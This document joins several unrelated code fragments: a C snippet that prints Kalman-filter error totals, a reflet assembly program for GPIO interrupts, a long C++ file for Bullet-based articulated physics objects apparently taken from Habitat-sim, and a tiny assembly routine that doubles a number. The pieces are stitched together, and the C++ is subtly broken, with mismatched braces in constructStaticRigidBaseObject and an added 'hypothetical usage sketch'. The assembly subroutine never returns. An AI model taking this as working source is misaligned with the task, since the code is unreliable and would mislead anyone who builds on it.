printf("总体测量误差 :%f\n", summerror_measure);
printf("总体卡尔曼滤波误差:%f\n", summerror_kalman);
printf("卡尔曼误差所占比例:%d%%\n", 100 - (int)((summerror_kalman / summerror_measure) * 100));
}
|
wordsize 8
;this is the code used to make rom3 used in simu3_tb. This should be compiled with reflet-masm.
;This program runs a debug instruction with level 2 each time a bit in the GPIO is flipped
;The base address for the GPIO is 0x80 and the address for the exti is 0x88
label start
;configuring the GPIO
set+ 132 ;address of the GPIO interrupt control
cpy R1
set 0
not WR ;setting 0xFF to enable all interrupts
cpy R2
str R1
set 1
add R1
cpy R1
read R2
str R1
set 1
add R1
cpy R1
read R2
str R1
set 1
add R1
cpy R1
read R2
str R1
;configuring the interrupt manager
set 1
add R1
cpy R1
set 1
str R1
add R1
cpy R1
set 2
str R1
set 1
add R1
cpy R1 ;setting the status register in R1
;configuring the interruption on the cpu side
set 1
add R1
cpy R1 ;storing the value of the exti status register in R1
setlab intRoutine
setint 2
set+ 32 ;enable the int2 flag
cpy SR
;infinite loop
setlab loop
label loop
slp
slp
jmp
quit ;unreachable
label intRoutine
cpy R2 ;saving the value of the WR
debug
set 0
str R1 ;clearing the status register of the interrupt manager
read R2
retint
|
// Copyright (c) Facebook, Inc. and its affiliates.
// This source code is licensed under the MIT license found in the
// LICENSE file in the root directory of this source tree.
// Construction code adapted from Bullet3/examples/
#include "BulletArticulatedObject.h"
#include "BulletDynamics/Featherstone/btMultiBodyLinkCollider.h"
#include "BulletPhysicsManager.h"
#include "BulletURDFImporter.h"
#include "esp/scene/SceneNode.h"
namespace Mn = Magnum;
namespace Cr = Corrade;
namespace esp {
namespace physics {
// set node state from btTransform
// TODO: this should probably be moved
static void setRotationScalingFromBulletTransform(const btTransform& trans,
scene::SceneNode* node) {
Mn::Matrix4 converted{trans};
node->setRotation(Mn::Quaternion::fromMatrix(converted.rotation()));
node->setTranslation(converted.translation());
}
///////////////////////////////////
// Class functions
///////////////////////////////////
BulletArticulatedObject::~BulletArticulatedObject() {
// ESP_DEBUG() << "deconstructing ~BulletArticulatedObject";
if (objectMotionType_ == MotionType::DYNAMIC) {
// KINEMATIC and STATIC objects have already been removed from the world.
bWorld_->removeMultiBody(btMultiBody_.get());
}
// remove link collision objects from world
for (int colIx = 0; colIx < btMultiBody_->getNumLinks(); ++colIx) {
auto* linkCollider = btMultiBody_->getLinkCollider(colIx);
bWorld_->removeCollisionObject(linkCollider);
collisionObjToObjIds_->erase(linkCollider);
delete linkCollider;
}
// remove fixed base rigid body
if (bFixedObjectRigidBody_) {
bWorld_->removeRigidBody(bFixedObjectRigidBody_.get());
collisionObjToObjIds_->erase(bFixedObjectRigidBody_.get());
bFixedObjectRigidBody_ = nullptr;
bFixedObjectShape_ = nullptr;
}
// remove base collider
auto* baseCollider = btMultiBody_->getBaseCollider();
bWorld_->btCollisionWorld::removeCollisionObject(baseCollider);
collisionObjToObjIds_->erase(baseCollider);
delete baseCollider;
// remove motors from the world
for (auto& motorId : getExistingJointMotors()) {
BulletArticulatedObject::removeJointMotor(motorId.first);
}
// remove joint limit constraints
for (auto& jlIter : jointLimitConstraints) {
bWorld_->removeMultiBodyConstraint(jlIter.second.con);
delete jlIter.second.con;
}
}
void BulletArticulatedObject::initializeFromURDF(
URDFImporter& urdfImporter,
const Mn::Matrix4& worldTransform,
scene::SceneNode* physicsNode) {
Mn::Matrix4 rootTransformInWorldSpace{worldTransform};
BulletURDFImporter& u2b = *(static_cast<BulletURDFImporter*>(&urdfImporter));
auto urdfModel = u2b.getModel();
int urdfLinkIndex = u2b.getRootLinkIndex();
// int rootIndex = u2b.getRootLinkIndex();
// NOTE: recursive path only
u2b.convertURDF2BulletInternal(urdfLinkIndex, rootTransformInWorldSpace,
bWorld_.get(), linkCompoundShapes_,
linkChildShapes_);
if (u2b.cache->m_bulletMultiBody) {
btMultiBody* mb = u2b.cache->m_bulletMultiBody;
jointLimitConstraints = u2b.cache->m_jointLimitConstraints;
mb->setHasSelfCollision((u2b.flags & CUF_USE_SELF_COLLISION) !=
0); // NOTE: default no
mb->finalizeMultiDof();
btTransform localInertialFrameRoot =
u2b.cache->m_urdfLinkLocalInertialFrames[urdfLinkIndex];
{
mb->setBaseWorldTransform(btTransform(rootTransformInWorldSpace) *
localInertialFrameRoot);
}
{
btAlignedObjectArray<btQuaternion> scratch_q;
btAlignedObjectArray<btVector3> scratch_m;
mb->forwardKinematics(scratch_q, scratch_m);
mb->updateCollisionObjectWorldTransforms(scratch_q, scratch_m);
}
btMultiBody_.reset(
mb); // take ownership of the object in the URDFImporter cache
bWorld_->addMultiBody(btMultiBody_.get());
btMultiBody_->setCanSleep(true);
// construct separate fixed base rigid object proxy for marked links
constructStaticRigidBaseObject();
// create the BulletArticulatedLinks
for (size_t urdfLinkIx = 0;
urdfLinkIx < urdfImporter.getModel()->m_links.size(); ++urdfLinkIx) {
int bulletLinkIx =
u2b.cache->m_urdfLinkIndices2BulletLinkIndices[urdfLinkIx];
auto urdfLink = u2b.getModel()->m_links.at(
u2b.getModel()->m_linkIndicesToNames[urdfLinkIx]);
ArticulatedLink* linkObject = nullptr;
if (bulletLinkIx >= 0) {
links_[bulletLinkIx] = std::make_unique<BulletArticulatedLink>(
&physicsNode->createChild(), resMgr_, bWorld_, bulletLinkIx,
collisionObjToObjIds_);
linkObject = links_[bulletLinkIx].get();
linkObject->linkJointName = urdfLink->m_parentJoint.lock()->m_name;
} else {
if (!baseLink_) {
baseLink_ = std::make_unique<BulletArticulatedLink>(
&node().createChild(), resMgr_, bWorld_, bulletLinkIx,
collisionObjToObjIds_);
}
linkObject = baseLink_.get();
}
linkObject->linkName = urdfLink->m_name;
linkObject->node().setType(esp::scene::SceneNodeType::OBJECT);
}
// Build damping motors
for (int linkIx = 0; linkIx < btMultiBody_->getNumLinks(); ++linkIx) {
btMultibodyLink& link = btMultiBody_->getLink(linkIx);
JointMotorSettings settings;
settings.maxImpulse = double(link.m_jointDamping);
if (supportsSingleDofJointMotor(linkIx)) {
settings.motorType = JointMotorType::SingleDof;
createJointMotor(linkIx, settings);
} else if (link.m_jointType == btMultibodyLink::eSpherical) {
settings.motorType = JointMotorType::Spherical;
createJointMotor(linkIx, settings);
}
}
// set user config attributes from model.
setUserAttributes(urdfModel->getUserConfiguration());
// in case the base transform is not zero by default
syncPose();
}
}
void BulletArticulatedObject::constructStaticRigidBaseObject() {
// start explicitly with base collider
btCollisionObject* col = btMultiBody_->getBaseCollider();
btTransform tr;
tr.setIdentity();
for (int m = -1; m < btMultiBody_->getNumLinks(); ++m) {
if (m >= 0) {
// prepare for link
col = btMultiBody_->getLink(m).m_collider;
// check the collider before dereferencing it
if (col == nullptr) {
continue;
}
tr = col->getWorldTransform();
}
}
if (col->getBroadphaseHandle()->m_collisionFilterGroup ==
int(CollisionGroup::Static)) {
// accumulate shapes in the new compound
if (bFixedObjectShape_ == nullptr) {
bFixedObjectShape_ = std::make_unique<btCompoundShape>();
}
bFixedObjectShape_->addChildShape(tr, col->getCollisionShape());
// disable collisions for the old object
col->getBroadphaseHandle()->m_collisionFilterGroup =
int(CollisionGroup::Noncollidable);
col->getBroadphaseHandle()->m_collisionFilterMask = uint32_t(
CollisionGroupHelper::getMaskForGroup(CollisionGroup::Noncollidable));
}
}
// create the proxy btRigidBody to replace the static shapes
if (bFixedObjectShape_ != nullptr) {
btRigidBody::btRigidBodyConstructionInfo info =
btRigidBody::btRigidBodyConstructionInfo(0.f, nullptr,
bFixedObjectShape_.get());
bFixedObjectRigidBody_ = std::make_unique<btRigidBody>(info);
bWorld_->addRigidBody(
bFixedObjectRigidBody_.get(), int(CollisionGroup::Static),
uint32_t(
CollisionGroupHelper::getMaskForGroup(CollisionGroup::Static)));
collisionObjToObjIds_->emplace(bFixedObjectRigidBody_.get(), objectId_);
}
}
void BulletArticulatedObject::updateNodes(bool force) {
isDeferringUpdate_ = false;
if (force || btMultiBody_->getBaseCollider()->isActive()) {
setRotationScalingFromBulletTransform(btMultiBody_->getBaseWorldTransform(),
&node());
}
// update link transforms
for (auto& link : links_) {
if (force || btMultiBody_->getLinkCollider(link.first)->isActive())
setRotationScalingFromBulletTransform(
btMultiBody_->getLink(link.first).m_cachedWorldTransform,
&link.second->node());
}
}
////////////////////////////
// BulletArticulatedLink
////////////////////////////
void BulletArticulatedObject::resetStateFromSceneInstanceAttr(
CORRADE_UNUSED bool defaultCOMCorrection) {
auto sceneObjInstanceAttr = getSceneInstanceAttributes();
if (!sceneObjInstanceAttr) {
// if no scene instance attributes specified, no initial state is set
return;
}
// Set whether dofs should be clamped to limits before phys step
autoClampJointLimits_ = sceneObjInstanceAttr->getAutoClampJointLimits();
// now move objects
// set object's location and rotation based on translation and rotation
// params specified in instance attributes
auto translate = sceneObjInstanceAttr->getTranslation();
// construct initial transformation state.
Mn::Matrix4 state = Mn::Matrix4::from(
sceneObjInstanceAttr->getRotation().toMatrix(), translate);
setTransformation(state);
// set object's motion type if different than set value
const physics::MotionType attrObjMotionType =
static_cast<physics::MotionType>(sceneObjInstanceAttr->getMotionType());
if (attrObjMotionType != physics::MotionType::UNDEFINED) {
setMotionType(attrObjMotionType);
}
// set initial joint positions
// get array of existing joint dofs
std::vector<float> aoJointPose = getJointPositions();
// get instance-specified initial joint positions
const auto& initJointPos = sceneObjInstanceAttr->getInitJointPose();
// map instance vals into
size_t idx = 0;
for (const auto& elem : initJointPos) {
if (idx >= aoJointPose.size()) {
ESP_WARNING() << "Attempting to specify more initial joint poses than "
"exist in articulated object"
<< sceneObjInstanceAttr->getHandle() << ", so skipping";
break;
}
aoJointPose[idx++] = elem.second;
}
setJointPositions(aoJointPose);
// set initial joint velocities
// get array of existing joint vel dofs
std::vector<float> aoJointVels = getJointVelocities();
// get instance-specified initial joint velocities
const std::map<std::string, float>& initJointVel =
sceneObjInstanceAttr->getInitJointVelocities();
idx = 0;
for (const auto& elem : initJointVel) {
if (idx >= aoJointVels.size()) {
ESP_WARNING()
<< "Attempting to specify more initial joint velocities than "
"exist in articulated object"
<< sceneObjInstanceAttr->getHandle() << ", so skipping";
break;
}
aoJointVels[idx++] = elem.second;
}
setJointVelocities(aoJointVels);
} // BulletArticulatedObject::resetStateFromSceneInstanceAttr
void BulletArticulatedObject::setRootState(const Mn::Matrix4& state) {
btTransform tr{state};
btMultiBody_->setBaseWorldTransform(tr);
if (bFixedObjectRigidBody_) {
bFixedObjectRigidBody_->setWorldTransform(tr);
}
// update the simulation state
updateKinematicState();
}
Mn::Vector3 BulletArticulatedObject::getRootLinearVelocity() const {
return Mn::Vector3(btMultiBody_->getBaseVel());
}
void BulletArticulatedObject::setRootLinearVelocity(const Mn::Vector3& linVel) {
btMultiBody_->setBaseVel(btVector3(linVel));
}
Mn::Vector3 BulletArticulatedObject::getRootAngularVelocity() const {
return Mn::Vector3(btMultiBody_->getBaseOmega());
}
void BulletArticulatedObject::setRootAngularVelocity(
const Mn::Vector3& angVel) {
btMultiBody_->setBaseOmega(btVector3(angVel));
}
void BulletArticulatedObject::setJointForces(const std::vector<float>& forces) {
if (forces.size() != size_t(btMultiBody_->getNumDofs())) {
ESP_DEBUG() << "Force vector size mis-match (input:" << forces.size()
<< ", expected:" << btMultiBody_->getNumDofs()
<< "), aborting.";
}
int dofCount = 0;
for (int i = 0; i < btMultiBody_->getNumLinks(); ++i) {
btMultibodyLink& link = btMultiBody_->getLink(i);
for (int dof = 0; dof < link.m_dofCount; ++dof) {
link.m_jointTorque[dof] = forces[dofCount];
dofCount++;
}
}
}
void BulletArticulatedObject::addJointForces(const std::vector<float>& forces) {
if (forces.size() != size_t(btMultiBody_->getNumDofs())) {
ESP_DEBUG() << "Force vector size mis-match (input:" << forces.size()
<< ", expected:" << btMultiBody_->getNumDofs()
<< "), aborting.";
}
int dofCount = 0;
for (int i = 0; i < btMultiBody_->getNumLinks(); ++i) {
btMultibodyLink& link = btMultiBody_->getLink(i);
for (int dof = 0; dof < link.m_dofCount; ++dof) {
link.m_jointTorque[dof] += forces[dofCount];
dofCount++;
}
}
}
std::vector<float> BulletArticulatedObject::getJointForces() {
std::vector<float> forces(btMultiBody_->getNumDofs());
int dofCount = 0;
for (int i = 0; i < btMultiBody_->getNumLinks(); ++i) {
btScalar* dofForces = btMultiBody_->getJointTorqueMultiDof(i);
for (int dof = 0; dof < btMultiBody_->getLink(i).m_dofCount; ++dof) {
forces[dofCount] = dofForces[dof];
dofCount++;
}
}
return forces;
}
void BulletArticulatedObject::setJointVelocities(
const std::vector<float>& vels) {
if (vels.size() != size_t(btMultiBody_->getNumDofs())) {
ESP_DEBUG() << "Velocity vector size mis-match (input:" << vels.size()
<< ", expected:" << btMultiBody_->getNumDofs()
<< "), aborting.";
}
int dofCount = 0;
for (int i = 0; i < btMultiBody_->getNumLinks(); ++i) {
if (btMultiBody_->getLink(i).m_dofCount > 0) {
// this const_cast is only needed for Bullet 2.87. It is harmless in any
// case.
btMultiBody_->setJointVelMultiDof(i, const_cast<float*>(&vels[dofCount]));
dofCount += btMultiBody_->getLink(i).m_dofCount;
}
}
}
std::vector<float> BulletArticulatedObject::getJointVelocities() {
std::vector<float> vels(btMultiBody_->getNumDofs());
int dofCount = 0;
for (int i = 0; i < btMultiBody_->getNumLinks(); ++i) {
btScalar* dofVels = btMultiBody_->getJointVelMultiDof(i);
for (int dof = 0; dof < btMultiBody_->getLink(i).m_dofCount; ++dof) {
vels[dofCount] = dofVels[dof];
dofCount++;
}
}
return vels;
}
void BulletArticulatedObject::setJointPositions(
const std::vector<float>& positions) {
if (positions.size() != size_t(btMultiBody_->getNumPosVars())) {
ESP_DEBUG(Mn::Debug::Flag::NoSpace)
<< "Position vector size mis-match (input:" << positions.size()
<< ", expected:" << btMultiBody_->getNumPosVars() << "), aborting.";
}
int posCount = 0;
for (int i = 0; i < btMultiBody_->getNumLinks(); ++i) {
auto& link = btMultiBody_->getLink(i);
if (link.m_posVarCount > 0) {
btMultiBody_->setJointPosMultiDof(
i, const_cast<float*>(&positions[posCount]));
posCount += link.m_posVarCount;
}
}
// update the simulation state
updateKinematicState();
}
std::vector<float> BulletArticulatedObject::getJointPositions() {
std::vector<float> positions(btMultiBody_->getNumPosVars());
int posCount = 0;
for (int i = 0; i < btMultiBody_->getNumLinks(); ++i) {
btScalar* linkPos = btMultiBody_->getJointPosMultiDof(i);
for (int pos = 0; pos < btMultiBody_->getLink(i).m_posVarCount; ++pos) {
positions[posCount] = linkPos[pos];
posCount++;
}
}
return positions;
}
std::pair<std::vector<float>, std::vector<float>>
BulletArticulatedObject::getJointPositionLimits() {
std::vector<float> lowerLimits(btMultiBody_->getNumPosVars(), -INFINITY);
std::vector<float> upperLimits(btMultiBody_->getNumPosVars(), INFINITY);
int posCount = 0;
for (int i = 0; i < btMultiBody_->getNumLinks(); ++i) {
if (jointLimitConstraints.count(i) > 0) {
// a joint limit constraint exists for this link's parent joint
auto& jlc = jointLimitConstraints.at(i);
lowerLimits[posCount] = jlc.lowerLimit;
upperLimits[posCount] = jlc.upperLimit;
posCount++;
} else {
posCount += btMultiBody_->getLink(i).m_posVarCount;
}
}
CORRADE_INTERNAL_ASSERT(posCount == btMultiBody_->getNumPosVars());
return std::make_pair(lowerLimits, upperLimits);
}
void BulletArticulatedObject::addArticulatedLinkForce(int linkId,
Mn::Vector3 force) {
CORRADE_INTERNAL_ASSERT(getNumLinks() > linkId);
btMultiBody_->addLinkForce(linkId, btVector3{force});
}
float BulletArticulatedObject::getArticulatedLinkFriction(int linkId) {
CORRADE_INTERNAL_ASSERT(getNumLinks() > linkId);
return btMultiBody_->getLinkCollider(linkId)->getFriction();
}
void BulletArticulatedObject::setArticulatedLinkFriction(int linkId,
float friction) {
CORRADE_INTERNAL_ASSERT(getNumLinks() > linkId);
btMultiBody_->getLinkCollider(linkId)->setFriction(friction);
}
JointType BulletArticulatedObject::getLinkJointType(int linkId) const {
CORRADE_INTERNAL_ASSERT(getNumLinks() > linkId && linkId >= 0);
return JointType(int(btMultiBody_->getLink(linkId).m_jointType));
}
int BulletArticulatedObject::getLinkDoFOffset(int linkId) const {
CORRADE_INTERNAL_ASSERT(getNumLinks() > linkId && linkId >= 0);
return btMultiBody_->getLink(linkId).m_dofOffset;
}
int BulletArticulatedObject::getLinkNumDoFs(int linkId) const {
CORRADE_INTERNAL_ASSERT(getNumLinks() > linkId && linkId >= 0);
return btMultiBody_->getLink(linkId).m_dofCount;
}
int BulletArticulatedObject::getLinkJointPosOffset(int linkId) const {
CORRADE_INTERNAL_ASSERT(getNumLinks() > linkId && linkId >= 0);
return btMultiBody_->getLink(linkId).m_cfgOffset;
}
int BulletArticulatedObject::getLinkNumJointPos(int linkId) const {
CORRADE_INTERNAL_ASSERT(getNumLinks() > linkId && linkId >= 0);
return btMultiBody_->getLink(linkId).m_posVarCount;
}
void BulletArticulatedObject::reset() {
// reset positions and velocities to zero
// clears forces/torques
// Note: does not update root state
std::vector<float> zeros(btMultiBody_->getNumPosVars(), 0.0f);
// handle spherical quaternions
for (int i = 0; i < btMultiBody_->getNumLinks(); ++i) {
auto& link = btMultiBody_->getLink(i);
if (link.m_jointType ==
btMultibodyLink::eFeatherstoneJointType::eSpherical) {
// need a valid identity quaternion [0,0,0,1]
zeros[link.m_cfgOffset + 3] = 1;
}
}
// also updates kinematic state
setJointPositions(zeros);
btMultiBody_->clearConstraintForces();
btMultiBody_->clearVelocities();
btMultiBody_->clearForcesAndTorques();
}
void BulletArticulatedObject::setActive(bool active) {
if (!active) {
btMultiBody_->goToSleep();
} else {
btMultiBody_->wakeUp();
}
}
bool BulletArticulatedObject::isActive() const {
return btMultiBody_->isAwake();
}
bool BulletArticulatedObject::getCanSleep() {
return btMultiBody_->getCanSleep();
}
void BulletArticulatedObject::setMotionType(MotionType mt) {
if (mt == objectMotionType_) {
return;
}
if (mt == MotionType::UNDEFINED) {
return;
}
// only need to change the state if the previous state was different (i.e.,
// DYNAMIC -> other)
if (mt == MotionType::DYNAMIC) {
bWorld_->addMultiBody(btMultiBody_.get());
} else if (objectMotionType_ == MotionType::DYNAMIC) {
// TODO: STATIC and KINEMATIC are equivalent for simplicity. Could manually
// limit STATIC...
bWorld_->removeMultiBody(btMultiBody_.get());
}
objectMotionType_ = mt;
}
void BulletArticulatedObject::clampJointLimits() {
auto pose = getJointPositions();
bool poseModified = false;
// small epsilon to tolerate floating-point error at the limit boundaries
float corrective_eps = 0.000001;
int dofCount = 0;
for (int i = 0; i < btMultiBody_->getNumLinks(); ++i) {
if (jointLimitConstraints.count(i) > 0) {
// a joint limit constraint exists for this link
auto& jlc = jointLimitConstraints.at(i);
// position clamping:
if (pose[dofCount] < jlc.lowerLimit - corrective_eps) {
poseModified = true;
pose[dofCount] = jlc.lowerLimit;
} else if (pose[dofCount] > jlc.upperLimit + corrective_eps) {
poseModified = true;
pose[dofCount] = jlc.upperLimit;
}
}
// advance the dof counter past this link's dofs
dofCount += btMultiBody_->getLink(i).m_dofCount;
}
if (poseModified) {
setJointPositions(pose);
}
}
void BulletArticulatedObject::updateKinematicState() {
btMultiBody_->forwardKinematics(scratch_q_, scratch_m_);
btMultiBody_->updateCollisionObjectWorldTransforms(scratch_q_, scratch_m_);
// Need to update the aabbs manually also for broadphase collision detection
for (int linkIx = 0; linkIx < btMultiBody_->getNumLinks(); ++linkIx) {
bWorld_->updateSingleAabb(btMultiBody_->getLinkCollider(linkIx));
}
bWorld_->updateSingleAabb(btMultiBody_->getBaseCollider());
if (bFixedObjectRigidBody_) {
bWorld_->updateSingleAabb(bFixedObjectRigidBody_.get());
}
// update visual shapes
if (!isDeferringUpdate_) {
updateNodes(true);
}
}
/**
* @brief Specific callback function for ArticulatedObject::contactTest to
* screen self-collisions.
*/
struct AOSimulationContactResultCallback
: public SimulationContactResultCallback {
btMultiBody* mb_ = nullptr;
btRigidBody* fixedBaseColObj_ = nullptr;
/**
* @brief Constructor taking the AO's btMultiBody as input to screen
* self-collisions.
*/
AOSimulationContactResultCallback(btMultiBody* mb,
btRigidBody* fixedBaseColObj)
: mb_(mb), fixedBaseColObj_(fixedBaseColObj) {
bCollision = false;
}
bool needsCollision(btBroadphaseProxy* proxy0) const override {
// base method checks for group|mask filter
bool collides = SimulationContactResultCallback::needsCollision(proxy0);
// check for self-collision
if (!mb_->hasSelfCollision()) {
// This should always be a valid conversion to btCollisionObject
auto* co = static_cast<btCollisionObject*>(proxy0->m_clientObject);
auto* mblc = dynamic_cast<btMultiBodyLinkCollider*>(co);
if (mblc) {
if (mblc->m_multiBody == mb_) {
// screen self-collisions
collides = false;
}
} else if (co == fixedBaseColObj_) {
// screen self-collisions w/ fixed base rigid
collides = false;
}
}
return collides;
}
};
bool BulletArticulatedObject::contactTest() {
AOSimulationContactResultCallback src(btMultiBody_.get(),
bFixedObjectRigidBody_.get());
auto* baseCollider = btMultiBody_->getBaseCollider();
// Do a contact test for each piece of the AO and return at soonest contact.
// Should be cheaper to hit multiple local aabbs than to check the full scene.
if (bFixedObjectRigidBody_) {
src.m_collisionFilterGroup =
bFixedObjectRigidBody_->getBroadphaseHandle()->m_collisionFilterGroup;
src.m_collisionFilterMask =
bFixedObjectRigidBody_->getBroadphaseHandle()->m_collisionFilterMask;
bWorld_->getCollisionWorld()->contactTest(bFixedObjectRigidBody_.get(),
src);
if (src.bCollision) {
return src.bCollision;
}
} else if (baseCollider) {
src.m_collisionFilterGroup =
baseCollider->getBroadphaseHandle()->m_collisionFilterGroup;
src.m_collisionFilterMask =
baseCollider->getBroadphaseHandle()->m_collisionFilterMask;
bWorld_->getCollisionWorld()->contactTest(baseCollider, src);
if (src.bCollision) {
return src.bCollision;
}
}
for (int colIx = 0; colIx < btMultiBody_->getNumLinks(); ++colIx) {
auto* linkCollider = btMultiBody_->getLinkCollider(colIx);
src.m_collisionFilterGroup =
linkCollider->getBroadphaseHandle()->m_collisionFilterGroup;
src.m_collisionFilterMask =
linkCollider->getBroadphaseHandle()->m_collisionFilterMask;
bWorld_->getCollisionWorld()->contactTest(linkCollider, src);
if (src.bCollision) {
return src.bCollision;
}
}
return false;
} // contactTest
// ------------------------
// Joint Motor API
// ------------------------
bool BulletArticulatedObject::supportsSingleDofJointMotor(int linkIx) const {
bool canHaveMotor = (btMultiBody_->getLink(linkIx).m_jointType ==
btMultibodyLink::eRevolute ||
btMultiBody_->getLink(linkIx).m_jointType ==
btMultibodyLink::ePrismatic);
return canHaveMotor;
}
std::unordered_map<int, int> BulletArticulatedObject::createMotorsForAllDofs(
const JointMotorSettings& settings) {
std::unordered_map<int, int> motorIdsToLinks;
// Reserve space. We have an upperbound on size.
motorIdsToLinks.reserve(btMultiBody_->getNumLinks());
auto settingsCopy = settings;
for (int linkIx = 0; linkIx < btMultiBody_->getNumLinks(); ++linkIx) {
if (supportsSingleDofJointMotor(linkIx)) {
settingsCopy.motorType = JointMotorType::SingleDof;
} else if (btMultiBody_->getLink(linkIx).m_jointType ==
btMultibodyLink::eSpherical) {
settingsCopy.motorType = JointMotorType::Spherical;
} else {
// skip the creation phase for unsupported joints
continue;
}
int motorId = createJointMotor(linkIx, settingsCopy);
motorIdsToLinks[motorId] = linkIx;
}
ESP_DEBUG() << "BulletArticulatedObject::createMotorsForAllDofs():"
<< motorIdsToLinks;
return motorIdsToLinks;
}
int BulletArticulatedObject::createJointMotor(
const int linkIndex,
const JointMotorSettings& settings) {
// check for valid configuration
ESP_CHECK(
links_.count(linkIndex) != 0,
"BulletArticulatedObject::createJointMotor - no link with linkIndex ="
<< linkIndex);
if (settings.motorType == JointMotorType::SingleDof) {
ESP_CHECK(supportsSingleDofJointMotor(linkIndex),
"BulletArticulatedObject::createJointMotor - "
"JointMotorSettings.motorType==SingleDof incompatible with joint"
<< linkIndex);
} else {
// JointMotorType::Spherical
ESP_CHECK(getLinkJointType(linkIndex) == JointType::Spherical,
"BulletArticulatedObject::createJointMotor - "
"JointMotorSettings.motorType==Spherical incompatible with joint"
<< linkIndex);
}
auto motor = JointMotor::create_unique();
motor->settings = settings;
motor->index = linkIndex;
motor->motorId = nextJointMotorId_;
jointMotors_.emplace(nextJointMotorId_,
std::move(motor)); // cache the Habitat structure
if (settings.motorType == JointMotorType::SingleDof) {
auto btMotor = std::make_unique<btMultiBodyJointMotor>(
btMultiBody_.get(), linkIndex, settings.velocityTarget,
settings.maxImpulse);
btMotor->setPositionTarget(settings.positionTarget, settings.positionGain);
btMotor->setVelocityTarget(settings.velocityTarget, settings.velocityGain);
bWorld_->addMultiBodyConstraint(btMotor.get());
btMotor->finalizeMultiDof();
articulatedJointMotors.emplace(
nextJointMotorId_, std::move(btMotor)); // cache the Bullet structure
} else {
// JointMotorType::Spherical
auto btMotor = std::make_unique<btMultiBodySphericalJointMotor>(
btMultiBody_.get(), linkIndex, settings.maxImpulse);
btMotor->setPositionTarget(btQuaternion(settings.sphericalPositionTarget),
settings.positionGain);
btMotor->setVelocityTarget(btVector3(settings.sphericalVelocityTarget),
settings.velocityGain);
bWorld_->addMultiBodyConstraint(btMotor.get());
btMotor->finalizeMultiDof();
articulatedSphericalJointMotors.emplace(
nextJointMotorId_, std::move(btMotor)); // cache the Bullet structure
}
// force activation if motors are updated
setActive(true);
return nextJointMotorId_++;
} // BulletArticulatedObject::createJointMotor
void BulletArticulatedObject::removeJointMotor(const int motorId) {
ESP_CHECK(jointMotors_.count(motorId) > 0,
"BulletArticulatedObject::removeJointMotor - No motor exists with "
"motorId ="
<< motorId);
if (articulatedJointMotors.count(motorId) != 0u) {
bWorld_->removeMultiBodyConstraint(
articulatedJointMotors.at(motorId).get());
articulatedJointMotors.erase(motorId);
} else if (articulatedSphericalJointMotors.count(motorId) != 0u) {
bWorld_->removeMultiBodyConstraint(
articulatedSphericalJointMotors.at(motorId).get());
articulatedSphericalJointMotors.erase(motorId);
} else {
ESP_ERROR() << "Cannot remove JointMotor: invalid ID (" << motorId << ").";
return;
}
jointMotors_.erase(motorId);
// force activation if motors are updated
btMultiBody_->wakeUp();
}
void BulletArticulatedObject::updateJointMotor(
const int motorId,
const JointMotorSettings& settings) {
ESP_CHECK(jointMotors_.count(motorId) > 0,
"BulletArticulatedObject::updateJointMotor - No motor exists with "
"motorId ="
<< motorId);
ESP_CHECK(jointMotors_.at(motorId)->settings.motorType == settings.motorType,
"BulletArticulatedObject::updateJointMotor - "
"JointMotorSettings.motorType does not match joint type.");
jointMotors_.at(motorId)->settings = settings;
if (articulatedJointMotors.count(motorId) != 0u) {
auto& motor = articulatedJointMotors.at(motorId);
motor->setPositionTarget(settings.positionTarget, settings.positionGain);
motor->setVelocityTarget(settings.velocityTarget, settings.velocityGain);
motor->setMaxAppliedImpulse(settings.maxImpulse);
} else if (articulatedSphericalJointMotors.count(motorId) != 0u) {
auto& motor = articulatedSphericalJointMotors.at(motorId);
motor->setPositionTarget(btQuaternion(settings.sphericalPositionTarget),
settings.positionGain);
motor->setVelocityTarget(btVector3(settings.sphericalVelocityTarget),
settings.velocityGain);
motor->setMaxAppliedImpulse(settings.maxImpulse);
} else {
ESP_ERROR() << "Cannot update JointMotor. Invalid ID (" << motorId << ").";
return;
}
// force activation if motors are updated
setActive(true);
}
void BulletArticulatedObject::updateAllMotorTargets(
const std::vector<float>& stateTargets,
bool velocities) {
ESP_CHECK(stateTargets.size() ==
size_t(velocities ? btMultiBody_->getNumDofs()
: btMultiBody_->getNumPosVars()),
"BulletArticulatedObject::updateAllMotorTargets - stateTargets "
"size does not match object state size.");
for (auto& motor : jointMotors_) {
btMultibodyLink& btLink = btMultiBody_->getLink(motor.second->index);
int startIndex = velocities ? btLink.m_dofOffset : btLink.m_cfgOffset;
auto& settings = motor.second->settings;
if (settings.motorType == JointMotorType::SingleDof) {
auto& btMotor = articulatedJointMotors.at(motor.first);
if (velocities) {
settings.velocityTarget = double(stateTargets[startIndex]);
btMotor->setVelocityTarget(settings.velocityTarget,
settings.velocityGain);
} else {
// positions
settings.positionTarget = double(stateTargets[startIndex]);
btMotor->setPositionTarget(settings.positionTarget,
settings.positionGain);
}
} else {
// JointMotorType::Spherical
if (velocities) {
settings.sphericalVelocityTarget = {stateTargets[startIndex],
stateTargets[startIndex + 1],
stateTargets[startIndex + 2]};
articulatedSphericalJointMotors.at(motor.first)
->setVelocityTarget(btVector3(settings.sphericalVelocityTarget),
settings.velocityGain);
} else {
// positions
settings.sphericalPositionTarget =
Mn::Quaternion(Mn::Vector3(stateTargets[startIndex],
stateTargets[startIndex + 1],
stateTargets[startIndex + 2]),
stateTargets[startIndex + 3])
.normalized();
articulatedSphericalJointMotors.at(motor.first)
->setPositionTarget(btQuaternion(settings.sphericalPositionTarget),
settings.positionGain);
}
}
}
// force activation when motors are updated
setActive(true);
}
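// Hypothetical usage sketch (not part of the original file): drives every
// supported joint of an articulated object with position-control motors and
// then retargets them to hold the current pose. The name `ao` and the gain
// values are illustrative assumptions, not values from this codebase.
static void exampleCreatePositionMotors(BulletArticulatedObject& ao) {
JointMotorSettings settings;  // motorType is chosen per joint internally
settings.positionGain = 1.0;  // assumed gain, for illustration only
settings.maxImpulse = 10.0;   // assumed impulse cap, for illustration only
// creates one motor per supported joint; maps motorId -> linkIx
auto motorIdsToLinks = ao.createMotorsForAllDofs(settings);
(void)motorIdsToLinks;
// retarget all motors to hold the current joint positions
ao.updateAllMotorTargets(ao.getJointPositions(), /*velocities=*/false);
}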
} // namespace physics
} // namespace esp
|
again: movi r4 17 ; argument: r4 = 17
movi r1 twice ; r1 = address of subroutine twice
jalr r31 r1 ; call twice, saving the return address in r31 (assumed jalr link semantics)
movi r1 34 ; expected result of doubling 17
beq r1 r2 done ; result matches -> done
beq r0 r0 again ; unconditional branch: try again
done: halt
twice: add r2 r4 r4 ; r2 = r4 + r4
